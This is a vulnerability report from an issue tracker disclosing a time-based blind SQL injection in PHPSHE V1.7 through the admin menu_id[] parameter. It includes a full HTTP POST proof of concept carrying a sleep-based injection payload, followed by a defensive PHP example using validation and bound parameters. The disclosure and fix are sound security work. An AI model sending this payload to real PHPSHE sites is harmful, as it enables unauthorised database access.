
koyshe / phpshe


PHPSHE V1.7 is vulnerable to SQL injection.

Status: To do
Created on 2019-03-15 09:09

PHPSHE V1.7 is vulnerable to SQL injection. Attackers can inject SQL statements via the menu_id[] parameter sent to the server.

PoC:

POST /phpshe/admin.php?mod=menu&act=del&token=1dc02be6d9710d51e89a116af232dced HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpshe/admin.php?mod=menu
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Cookie: PHPSESSID=0a97c3f86f5b63a3e74ffcdf1c70b59c
Connection: close
Upgrade-Insecure-Requests: 1

menu_order%5B1%5D=1&menu_order%5B2%5D=2&menu_order%5B3%5D=3&menu_order%5B4%5D=4&menu_id%5B%5D=6'+and+IF(1=1,sleep(2),1)+and+'1'='1&menu_order%5B6%5D=6

Vulnerability verification:

The lines of code where the vulnerability exists:
module/admin/menu.php
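
One way to handle an array parameter such as menu_id[] before it reaches a DELETE statement, as an added example and not PHPSHE's own code (the contents of module/admin/menu.php are not shown in this report). The `menu` table, its columns and the function names are assumptions made for illustration.

```php
<?php
// Added example, not PHPSHE code. Table, column and function names are hypothetical.
declare(strict_types=1);

/** Return the submitted ids as integers, or throw if any element is not a plain decimal number. */
function parse_id_list($raw): array
{
    if (!is_array($raw) || $raw === []) {
        throw new InvalidArgumentException('menu_id must be a non-empty array');
    }
    $ids = [];
    foreach ($raw as $value) {
        // ctype_digit accepts only strings made of 0-9, so quotes, spaces and SQL keywords fail here.
        if (!is_string($value) || !ctype_digit($value) || strlen($value) > 9) {
            throw new InvalidArgumentException('menu_id contains a non-numeric value');
        }
        $ids[] = (int) $value;
    }
    return array_values(array_unique($ids));
}

/** Delete rows using one bound placeholder per id; no id is concatenated into the SQL text. */
function delete_menus(PDO $db, $rawIds): int
{
    $ids = parse_id_list($rawIds);
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("DELETE FROM menu WHERE menu_id IN ($placeholders)");
    $stmt->execute($ids);
    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE menu (menu_id INTEGER PRIMARY KEY, menu_name TEXT)');
$db->exec("INSERT INTO menu VALUES (5,'a'),(6,'b'),(7,'c')");

echo delete_menus($db, ['6', '7']), " rows deleted\n";

try {
    // The menu_id[] value from the request above, URL-decoded.
    delete_menus($db, ["6' and IF(1=1,sleep(2),1) and '1'='1"]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Validation and parameter binding are independent layers here: the type check rejects the request early, and the bound placeholders keep the query safe even if a value slips past validation.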

Comments (0)

lemon created the issue
